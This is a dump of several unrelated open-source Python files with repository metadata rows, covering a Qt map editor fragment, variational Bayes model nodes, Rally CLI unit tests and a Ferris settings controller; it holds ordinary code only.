return self.gc_state
def get_widget(self):
return self.tab_widget or self.widget
def update_scrollbars(self):
rect = self.workspace.get_map().get_bounding_rect()
border = 128
self.scroll_horz.setMinimum(rect.left - border)
self.scroll_horz.setMaximum(rect.right + border)
self.scroll_horz.setPageStep(self.editormap_widget.width())
self.scroll_horz.setSliderPosition(int(self.gc_state.get_pos().x))
self.scroll_vert.setMinimum(rect.top - border)
self.scroll_vert.setMaximum(rect.bottom + border)
self.scroll_vert.setPageStep(self.editormap_widget.height())
self.scroll_vert.setSliderPosition(int(self.gc_state.get_pos().y))
def set_sector_tab_label(self, index, text):
self.tab_widget.setTabText(index, "Sector \"%s\"" % text)
# EOF #
| gpl-3.0 | 6,706,988,355,870,626,000 | 31.211864 | 80 | 0.62181 | false | 3.357774 | false | false | false |
jameshensman/pyvb | src/pyvb/nodes/nodes_todo.py | 1 | 7789 | # -*- coding: utf-8 -*-
# Copyright 2009 James Hensman and Michael Dewar
# Licensed under the Gnu General Public license, see COPYING
import numpy as np
import node
from scipy import special #needed for calculating lower bound in Gamma, Wishart
class ConjugacyError(ValueError):
def __init__(self,message):
ValueError.__init__(self,message)
class hstack(node.Node):
"""A class to represent a Matrix whose columns are Normally distributed.
Arguments
----------
Attributes
----------
"""
def __init__(self,parents):
dims = [e.shape[0] for e in parents]
shape = (dims[0],len(parents))
node.Node.__init__(self, shape)
assert type(parents)==list
assert np.all(dims[0]==np.array(dims)),"dimensions incompatible"
self.parents = parents
self.shape = shape
[e.addChild(self) for e in self.parents]
def pass_down_Ex(self):
return np.hstack([e.pass_down_Ex() for e in self.parents])
def pass_down_ExxT(self):
""""""
return np.sum([p.pass_down_ExxT() for p in self.parents],0)
def pass_down_ExTx(self):
raise NotImplementedError
def pass_up_m1_m2(self,requester):
if self.shape[1] ==1:
#i'm a hstack of only _one_ vector.
# a corner case I guess...
child_messages = [c.pass_up_m1_m2(self) for c in self.children]
return sum([e[0] for e in child_messages]),sum([e[1] for e in child_messages])
#child messages consist of m1,m2,b,bbT
child_messages = [c.pass_up_m1_m2(self) for c in self.children]
i = self.parents.index(requester)
#here's m1 - \sum_{children} m1 bbT[i,i]
m1 = np.sum([m[0]*float(m[-1][i,i]) for m in child_messages],0)
#here's m2
m2 = np.zeros((self.shape[0],1))
        m2 += sum([m[1]*float(m[2][i]) for m in child_messages])# TODO Shouldn't this all be in the Multiplication node?
m2 -= sum([sum([np.dot(m[0]*m[-1][i,j],self.parents[j].pass_down_Ex()) for j in range(self.shape[1]) if not i==j]) for m in child_messages])
return m1,m2
class Transpose(node.Node):
    def __init__(self,parent):
        """I'm designing this to sit between a Gaussian node.Node and a multiplication node.Node (for inner products)"""
        # the parent must expose second moments in both orientations (i.e. be Gaussian-like)
        assert hasattr(parent, "pass_down_ExxT") and hasattr(parent, "pass_down_ExTx"), "Can only transpose Gaussian node.Nodes..."
        self.parent = parent
        self.shape = self.parent.shape[::-1]
        node.Node.__init__(self, self.shape)
        parent.addChild(self)
def pass_down_Ex(self):
return self.parent.pass_down_Ex().T
def pass_down_ExxT(self):
return self.parent.pass_down_ExTx()
def pass_down_ExTx(self):
return self.parent.pass_down_ExxT()
def pass_up_m1_m2(self,requester):
        child_messages = [c.pass_up_m1_m2(self) for c in self.children]
        return np.sum([m[0] for m in child_messages],0),np.sum([m[1] for m in child_messages],0).T
class Gamma:
"""
A Class to represent a Gamma random variable in a VB network
Arguments
----------
dim - int
The dimension of the node (can be more than 1 - see notes)
a0 - float
The prior value of a
b0 - float
The prior value of b
Attributes
----------
qa - float
The (variational) posterior value of a
qb - float
The (variational) posterior value of b
Notes
----------
The dimensionality of a Gamma node can be more than 1: this is useful for representing univariate noise. The expected value of the node is then simply a diagonal matrix with each diagonal element set to qa/qb.
    Gamma does not inherit from node.Node because it cannot be added, multiplied etc."""
def __init__(self,dim,a0,b0):
self.shape = (dim,dim)
self.a0 = a0
self.b0 = b0
self.children = []
self.update_a()#initialise q to correct value
self.qb = np.random.rand()#randomly initialise solution
def addChild(self,child):
self.children.append(child)
self.update_a()#re-initialise q to correct value
def update_a(self):
self.qa = self.a0
for child in self.children:
self.qa += 0.5*child.shape[0]
def update(self):
"""
Notes
----------
We update only the 'b' parameter, since the 'a' parameter can be done in closed form and does not need to be iterated. Note the use of trace() allows for children whose shape is not (1,1)"""
self.qb = self.b0
for child in self.children:
self.qb += 0.5*np.trace(child.pass_down_ExxT()) + 0.5*np.trace(child.mean_parent.pass_down_ExxT()) - np.trace(np.dot(child.pass_down_Ex(),child.mean_parent.pass_down_Ex().T))
def pass_down_Ex(self):
"""Returns the expected value of the node"""
return np.eye(self.shape[0])*self.qa/self.qb
def pass_down_lndet(self):
"""Return the log of the determinant of the expected value of this node"""
#return np.log(np.power(self.qa/self.qb,self.shape[0]))
return self.shape[0]*(np.log(self.qa) - np.log(self.qb))
def log_lower_bound(self):
"""Return this node's contribution to the log of the lower bound on the model evidence. """
Elnx = special.digamma(self.qa)-np.log(self.qb)#expected value of the log of this node
#terms in joint prob not covered by child nodes:
ret = (self.a0-1)*Elnx - special.gammaln(self.a0) + self.a0*np.log(self.b0) - self.b0*(self.qa/self.qb)
#entropy terms:
ret -= (self.qa-1)*Elnx - special.gammaln(self.qa) + self.qa*np.log(self.qb) - self.qb*(self.qa/self.qb)
return ret
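
# Usage sketch (added for illustration, not part of the original pyvb code):
# a Gamma node typically serves as the precision prior of a Gaussian noise node.
# Assuming a Gaussian child node class with the usual addChild wiring
# (hypothetical constructor arguments shown), the VB iteration would look like:
#
#   noise_precision = Gamma(dim=1, a0=1e-3, b0=1e-3)
#   y = Gaussian(dim=1, mean_parent=x, precision_parent=noise_precision)
#   for it in range(100):
#       y.update()
#       noise_precision.update()   # qa is fixed by update_a(); only qb is iterated
#   E_prec = noise_precision.pass_down_Ex()   # diagonal matrix with entries qa/qb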
class DiagonalGamma:
"""A class to implemet a diagonal prior for a multivariate (diagonal) Gaussian. Effectively a series of Gamma distributions
Arguments
----------
Attributes
----------
"""
def __init__(self,dim,a0s,b0s):
self.shape = (dim,dim)
assert a0s.size==self.shape[0]
assert b0s.size==self.shape[0]
self.a0s = a0s.flatten()
self.b0s = b0s.flatten()
self.children = []
self.update_a()#initialise q to correct value
self.qb = np.random.rand()#randomly initialise solution
def addChild(self,child):
assert child.shape == (self.shape[0],1)
self.children.append(child)
self.update_a()
def update_a(self):
self.qa = self.a0s.copy()
for child in self.children:
self.qa += 0.5
def update(self):
self.qb = self.b0s.copy()
for child in self.children:
self.qb += 0.5*np.diag(child.pass_down_ExxT()) + 0.5*np.diag(child.mean_parent.pass_down_ExxT()) - np.diag(np.dot(child.pass_down_Ex(),child.mean_parent.pass_down_Ex().T))
def pass_down_Ex(self):
return np.diag(self.qa/self.qb)
def pass_down_lndet(self):
"""Return the log of the determinant of the expected value of this node"""
return np.log(np.prod(self.qa/self.qb))
def log_lower_bound(self):
Elnx = special.digamma(self.qa)-np.log(self.qb)#expected value of the log of this node
#terms in joint prob not covered by child nodes:
ret = (self.a0s-1)*Elnx - special.gammaln(self.a0s) + self.a0s*np.log(self.b0s) - self.b0s*(self.qa/self.qb)
ret -= (self.qa-1)*Elnx - special.gammaln(self.qa) + self.qa*np.log(self.qb) - self.qb*(self.qa/self.qb)#entropy terms
return sum(ret)
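
# Note (added for clarity): Gamma above ties every dimension to one shared
# precision qa/qb, whereas DiagonalGamma keeps a separate (qa_i, qb_i) pair per
# dimension, so its pass_down_Ex() can return e.g. np.diag([3.1, 0.7]) for
# dim=2 instead of a scaled identity matrix.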
class Wishart:
""" A wishart random variable: the conjugate prior to the precision of a (full) multivariate Gaussian distribution"""
def __init__(self,dim,v0,w0):
self.shape = (dim,dim)
assert w0.shape==self.shape
self.v0 = v0
self.w0 = w0
self.children = []
self.update_v()#initialise qv to correct value
        #randomly initialise solution (for qw)
        l = np.random.randn(self.shape[0],1)
        self.qw = np.dot(l,l.T)
def addChild(self,child):
assert child.shape == (self.shape[0],1)
self.children.append(child)
self.update_v()
def update_v(self):
self.qv = self.v0
for child in self.children:
self.qv += 0.5
def update(self):
self.qw = self.w0
for child in self.children:
self.qw += 0.5*child.pass_down_ExxT() + 0.5*child.mean_parent.pass_down_ExxT() - np.dot(child.pass_down_Ex(),child.mean_parent.pass_down_Ex().T)
def pass_down_Ex(self):
return self.qv*np.linalg.inv(self.qw)
| gpl-3.0 | -6,679,971,533,538,718,000 | 31.323651 | 212 | 0.673899 | false | 2.771886 | false | false | false |
varunarya10/rally | tests/unit/cmd/test_manage.py | 2 | 1958 | # Copyright 2013: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
import mock
from rally.cmd import manage
from tests.unit import test
class CmdManageTestCase(test.TestCase):
@mock.patch("rally.cmd.manage.cliutils")
def test_main(self, cli_mock):
manage.main()
categories = {"db": manage.DBCommands,
"tempest": manage.TempestCommands}
cli_mock.run.assert_called_once_with(sys.argv, categories)
class DBCommandsTestCase(test.TestCase):
def setUp(self):
super(DBCommandsTestCase, self).setUp()
self.db_commands = manage.DBCommands()
@mock.patch("rally.cmd.manage.db")
def test_recreate(self, mock_db):
self.db_commands.recreate()
calls = [mock.call.db_drop(), mock.call.db_create()]
self.assertEqual(calls, mock_db.mock_calls)
class TempestCommandsTestCase(test.TestCase):
def setUp(self):
super(TempestCommandsTestCase, self).setUp()
self.tempest_commands = manage.TempestCommands()
self.tempest = mock.Mock()
@mock.patch("rally.cmd.manage.api")
def test_install(self, mock_api):
deployment_uuid = "deployment_uuid"
self.tempest_commands.install(deployment_uuid)
mock_api.Verification.install_tempest.assert_called_once_with(
deployment_uuid, None)
| apache-2.0 | -3,202,771,024,890,421,000 | 32.186441 | 78 | 0.670072 | false | 3.824219 | true | false | false |
markEarvin/password-tracker | plugins/settings/controllers/settings.py | 1 | 1102 | import ferris
from ..models.setting import Setting
import datetime
from google.appengine.api import memcache
class Settings(ferris.Controller):
class Meta:
prefixes = ('admin',)
components = (ferris.scaffold.Scaffolding,)
Model = Setting
def startup(self):
self.context['setting_classes'] = Setting.get_classes()
def admin_list(self):
self.context['settings'] = ferris.settings.settings()
def admin_edit(self, key):
model = Setting.factory(key)
instance = model.get_instance(static_settings=ferris.settings.settings())
self.meta.Model = model
self.scaffold.ModelForm = ferris.model_form(model)
self.context['settings_class'] = model
def reload_settings(**kwargs):
            self.components.flash_messages('Settings saved; however, the settings may not be updated on all instances. You may have to restart instances for the settings to take effect.', 'warning')
self.events.scaffold_after_save += reload_settings
return ferris.scaffold.edit(self, instance.key.urlsafe())
| mit | 8,638,258,176,234,224,000 | 32.393939 | 198 | 0.680581 | false | 4.190114 | false | false | false |